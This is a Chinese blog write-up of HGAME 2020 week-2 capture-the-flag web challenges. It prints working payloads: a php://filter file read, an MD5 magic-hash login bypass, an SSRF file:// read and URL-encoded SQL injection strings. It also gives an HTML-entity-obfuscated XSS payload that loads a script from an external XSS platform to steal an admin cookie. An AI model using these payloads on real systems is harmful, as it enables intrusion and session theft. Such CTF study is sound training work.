2020 HGAME WEB_Week2

最新推荐文章于 2024-10-10 11:26:46 发布
最新推荐文章于 2024-10-10 11:26:46 发布
阅读量1.5k 收藏
点赞数 4
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43305301/article/details/104143545
版权

Cosmos的博客后台

涉及内容
PHP 伪协议
文件包含

Hint:flag保存在根目录下

打开发现是一个登陆页面,注意到URL有一个参数是action,如下:

http://xxxxxxx/?action=login.php

尝试伪协议获取login源码:

?action=php://filter/convert.base64-encode/resource=login.php

发现可以获取,源码如下(去掉了无用部分):

<?php
include "config.php";
session_start();

//Only for debug
if (DEBUG_MODE){	
    if(isset($_GET['debug'])) {
        $debug = $_GET['debug'];
        if (!preg_match("/^[a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]*$/", $debug)) {
            die("args error!");
        }
        eval("var_dump($$debug);");
    }
}

if(isset($_SESSION['username'])) {
    header("Location: admin.php");
    exit();
}
else {
    if (isset($_POST['username']) && isset($_POST['password'])) {
        if ($admin_password == md5($_POST['password']) && $_POST['username'] === $admin_username){
            $_SESSION['username'] = $_POST['username'];
            header("Location: admin.php");
            exit();
        }
        else {
            echo "用户名或密码错误";
        }
    }
}
?>

登录需要知道admin_usernameadmin_password的值,盲猜应该是在config文件里面定义的,但是被过滤,无法直接读取config.php,需要从其他地方下手。于是想到了超全局变量$GLOBALS。通过$debug=GLOBALS可以获取当前定义的所有变量值,得到:

["admin_username"]=> string(7) "Cosmos!"
["admin_password"]=> string(32) "0e114902927253523756713132279690"

密码是经过MD5加密的,无法得到原密码,还是老套路,密码直接尝试输入QNKCDZO,登陆成功。

这里利用的是PHP弱类型。
如果两个比较的字符串都是0e开头,那么比较时会被当成科学计数法,运算结果为0。从而原本不相等的两个字符串在此通过弱比较。

进入后台后,没发现什么特别的地方,回到login页面,尝试读取admin.php,源码如下(去掉无用部分):

<?php
include "config.php";
session_start();
if(!isset($_SESSION['username'])) {
    header('Location: index.php');
    exit();
}

function insert_img() {
    if (isset($_POST['img_url'])) {
        $img_url = @$_POST['img_url'];
        $url_array = parse_url($img_url);
        if (@$url_array['host'] !== "localhost" && $url_array['host'] !== "timgsa.baidu.com") {
            return false;
        }   
        $c = curl_init();
        curl_setopt($c, CURLOPT_URL, $img_url);
        curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
        $res = curl_exec($c);
        curl_close($c);
        $avatar = base64_encode($res);

        if(filter_var($img_url, FILTER_VALIDATE_URL)) {
            return $avatar;
        }
    }
    else {
        return base64_encode(file_get_contents("static/logo.png"));
    }
}
?>

发现只能接受localhosttimgsa.baidu.com的外链内容,然后它会通过curl访问该URL获取图片。这里注意到图片在页面中是以data:image/jpeg;base64,+base64_code的方法嵌入的,想到可以利用file协议使curl读出flag内容,然后将其嵌入到页面源码中,从而获取flag。

这是在RFC2397中定义的Data URI scheme.
Data URI scheme 允许我们使用内联(inline-code)的方式在网页中包含数据,目的是将一些小的数据,直接嵌入到网页中,从而不用再从外部文件载入。常用于将图片嵌入网页。

构造payload:

file://localhost/../../../../../../../../../flag

等待网页更新后,发现图片加载失败,于是查看源码发现图片处:

<img height="200" width="500" 
src="data:image/jpeg;base64,aGdhbWV7cEhwXzFzX1RoM19CM3NUX0w0bkd1NGdFIUAhfQo=">

解码后得flag。

Cosmos的留言板

涉及内容
SQL注入

初步测试,发现参数id可注入,同时初步测试出空格和select被过滤,可分别使用/**/和双写绕过。
然后就是一个很简单的注入了。
Payload:

id=%27%2f**%2funion%2f**%2fselselectect%2f**%2fdatabase()%3b%23

得到数据库名easysql

id=%27union%2f**%2fselselectect%2f**%2fgroup_concat(table_name)%2f**%2ffrom% 2f**%2finformation_schema.tables%2f**%2fwhere%2f**%2ftable_schema%3d%27easysql%27%3b%23

得到表名f1aggggggggggggg

id=%27%2f**%2funion%2f**%2fselselectect%2f**%2fgroup_concat(column_name)%2f* *%2ffrom%2f**%2finformation_schema.columns%2f**%2fwhere%2f**%2ftable_name%3 d%27f1aggggggggggggg%27%2f**%2fand%2f**%2ftable_schema%3d%27easysql%27%3b%23

得到字段名fl4444444g

id=%27%2f**%2funion%2f**%2fselselectect%2f**%2ffl4444444g%2f**%2ffrom%2f**%2ff1aggggggggggggg%3b%23

得到flag.

Cosmos的新语言

涉及内容
简单脚本

进入页面,发现页面直接给了源码和一串密文,找找线索,有file_get_contents('mycode'),于是尝试访问mycode看到生成密文的源码:

function encrypt($str){
    $result = '';
    for($i = 0; $i &lt; strlen($str); $i++){
        $result .= chr(ord($str[$i]) + 1);
    }
    return $result;
}

echo(strrev(str_rot13(strrev(base64_encode(str_rot13(str_rot13(str_rot13(str_rot13(strrev(encrypt($_SERVER['token'])))))))))));

if(@$_POST['token'] === $_SERVER['token']){
    echo($_SERVER['flag']);
}

可以看到他对token进行了一系列操作,只要post过去一个原始token就可以得到flag。
刷新几次后发现每隔几秒钟会刷新一下,这些编码函数都是随机生成的,所以写脚本如下:

<?php
function decrypt($str){
    $result = '';
    for($i = 0; $i < strlen($str); $i++){
        $result .= chr(ord($str[$i]) - 1);
    }    
    return $result;
}

$url="http://11fd5a58f8.php.hgame.n3ko.co";

$token=file_get_contents($url);
$token=explode("\n", $token); 
$token=$token[4];
// echo $token;

$resource=file_get_contents($url."/mycode");
$resource=explode("\n",$resource);
// echo $resource[8]."<br>";
$resource=explode("(", $resource[8]);
// foreach ($resource as $item){
// echo "~".$item."~<br>";

for ($i=1;$i<=10;$i++){
    switch ($resource[$i]){
        case 'base64_encode':
            $token = base64_decode($token);
            break;
        case 'strrev':
            $token = strrev($token);
            break;
        case 'str_rot13':
            $token = str_rot13($token);
            break;
        case 'encrypt':            
            $token = decrypt($token);
            break;
    }
}
$opts["http"]=array(
    "method" => "POST",
    "header" => "Content-type: application/x-www-form-urlencoded",
    "content" => http_build_query(array("token" => $token))
);
$content=stream_context_create($opts);
$response=file_get_contents($url,false,$content);
echo "<br>".$response;

本地运行直接得到flag。

Cosmos的聊天室

涉及内容
XSS攻击

打开页面如下:
聊天室界面
发现留言板正则过滤了所有的标签,这点可以利用浏览器的容错性进行绕过,不闭合右标签,最后加注释即可。
另外留言板也将所有字母转为大写,可用HTML字符实体进行绕过。
右上角提示flag is here,打开返回内容:

Only admin can get the flag, your token shows that you're not admin!

需要获取管理员身份,才能获取flag。
于是构建payload,利用xss平台想办法获取管理员的cookie

<img src=x onerror=&#115;&#61;&#99;&#114;&#....... //

其中编码内容为:

s=createElement('script');body.appendChild(s);s.src='xss_url';

至于后面的6位md5验证码,写脚本进行碰撞即可:

import hashlib

md5v ="验证码的值"
def sb(md5v):
    for x in range(1,10000000):
        md5_value=hashlib.md5(str(x).encode('utf-8')).hexdigest()
        if md5_value[:6]==md5v:
            return str(x)

print(sb(md5v))

提交即可。
这个bot好像有点什么问题,我刚开始还以为是我payload有问题,换了n种,结果最后不是我的问题,同一个payload传了八百万次,终于有一次收到cookie了(就一次),真的是心态爆炸
xss平台上得到的信息如下:
token
拿到token了,修改cookie,伪装成admin身份,然后打开flag页面,发现输出了flag。

(个人整理,如有错误欢迎指正)

kaleido76
关注
专栏目录
Hgame
忙碌者的博客
02-06 5298
Hgame WEEK1 1.换头大作战 题目地址 题目首先是这样一个界面,既然让我提交,那自然要提交试试,随便填个1进去提交试试。 提交完提示: request method is error.I think POST is better 既然让我POST,果断调出HACKBAR,同时注意到url后面多了个want变量,自然想到去POST这个want。 构造want=1,RUN,得到下图:需要lo...
BUUCTF hgame2018_flag_server
weixin_45441024的博客
11-28 458
BUUCTF hgame2018_flag_server 下载附件之后永远都是先check一下 紧接着我们将其拖入IDA中查看一下: int __cdecl main(int argc, const char **argv, const char **envp) { unsigned int v3; // eax@13 int result; // eax@20 int v5; // ecx@20 int v6; // [sp+8h] [bp-60h]@6 int v7; // [sp
HGAME 2020 web week2 writeup
stepone4ward的博客
02-04 1125
不要当懒狗
CTF杂项——[HGAME 2022 week1]好康的流量
最新发布
hzhfhsq的博客
10-10 298
用Stegsolve打开图片,点击图片下方左右箭头切换模式,发现一个条形码。用手机扫码得到前半段flag为hgame{ez_1mg_得到一个.eml文件,直接将扩展名改为.mht。得到flag后半段Steg4n0graphy}Wireshark打开流量包,导出IMF对象。使用浏览器打开,有一张图片,另存下来。
hgameweek2-wp
wuerror的博客
02-23 768
week2-wp wuerror web easy php 使用…/./来绕过 str_replace(`'../', '', $img`) ?img=…/./flag可以得到回显maybe_you_should_think_think 再想想,试试伪协议读取文件看看 伪协议:?img=php://filter/read=convert.base64-encode/resource=…/...
HGAME 2018 Web Week2 Random?
柠檬木有枝
10-21 593
题目描述 提示 vim 改代码,vim 会生成 swp 文件以防止出错是恢复,直接 dowm 下 swp 文件恢复源码,这里比较坑的一点是完整的文件名是.random.php.swp。 恢复过后 random.php 源码如下 要求传入一串对象的序列化内容,而且这个对象的两个变量会被赋予随机值,要求这两个变量的值相等方能getflag。 起初考虑了一下觉得是反序列化漏洞,但是却不存在魔术方法...
re学习笔记(29)HGAME2020-re-Level-Week1-maze
逆向随笔
01-24 881
HGAME2020-re-Level-Week1-maze 新手一枚,如有错误(不足)请指正,谢谢!! 个人博客:点击进入 题目链接:HGAME2020-re-Level-Week1-maze 题目下载:点击下载 题目描述 You won’t figure out anything if you give in to fear. 学习资料: https://ctf-wiki.github.io/c...
hgame_week3_re_wp
令则
03-01 368
hgame week re hgame week3 的re, 链接: https://pan.baidu.com/s/1jdYHLzhz3ygEtW0NPgqQsw 密码: w03a 文章目录hgame week rehiddenollvm hidden 首先搜索字符串找到输出正误的函数,然后查看调用找到check函数: 程序逻辑比较清晰,就是在encode函数中加密,然后查看是否和两个值...
hgame2020-week2-re
令则
02-10 1544
hgame week2 hgame ctf week2的逆向wp 题目链接: 链接: https://pan.baidu.com/s/1mmUxYJ-bfh-hf2akSiMRCA 密码: um92 文章目录hgame week2unpackcrackmebaby pybaby pycpython字节码pythonu unpack 这是一个elf脱壳的题目,我用的方法是先运行程序,然后使用gd...
堆溢出漏洞利用: EldenRingFinal 中的_hgame2024_off_by_one攻击
本周四的hgame2024官方题解涉及一个Pwn挑战,题目是关于利用堆溢出漏洞实现任意写入并泄露libc库的内存地址,进而获取shell。出题思路主要围绕以下几个关键步骤: 1. **漏洞利用原理**: 题目利用的是off_by_one...
hgame:Haskell 游戏引擎
05-30
游戏 Haskell 游戏引擎
2020 HGAME WEB_Week1
Kaleido76的博客
01-27 1671
包含题目[Cosmos的博客][接头霸王][CodeWorld][鸡你太美]
HGAME-week4-web-wp
静仙的博客
02-19 4752
文章目录hgame第四周-web1.Markdown Online2.Comment3.FileSystem hgame第四周-web 1.Markdown Online 考点:markdown xss,nodejs vm逃逸,JavaScript语言特性 参考:[HGAME 2022 WEB | Y0ng的博客 (yongsheng.site)](http://www.yongsheng.site/2022/02/17/HGAME 2022 WEB/#more) 以及官方wp和github的payload
HGAME2020 每日推荐
W3rsn
03-17 3097
http://oss-east.zhouweitong.site/hgame2020/week1/Recommendation_0ddwppIx1thGhquA9kf0lGDHR4EFr1Y4.zip 这个压缩包下下来解压后是一个wireshark的包,用wireshark打开看看 通过对每个HTTP请求的分析,大概可以知道他打开了wordpress什么东东的,...
2020 HGAME WEB_Week3 [序列之争]
Kaleido76的博客
02-08 1079
一道反序列化漏洞题目[序列之争]
2020 HGAME WEB_Week3 [二发入魂][cosmos的二手市场]
Kaleido76的博客
02-08 600
一道mt_rand()伪随机题目[二发入魂]和一道条件竞争题目[cosmos的二手市场]
HGAME2020第一周杂项题——欢迎参加HGame
qq_44060093的博客
01-29 1126
看题可知是base64编码,在线网站解密: https://base64.supfree.net/ 建议将空格改成/ 在在线网站在线解密莫尔斯 http://www.atool9.com/morse.php
hGame2020第二周第一题
giaogiao123的博客
02-10 2491
payload:action=php://filter/read=convert.base64-encode/resource=login.php base64解码 <?php include "config.php"; session_start(); //Only for debug if (DEBUG_MODE){ if(isset($_GET['debug'])) {...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值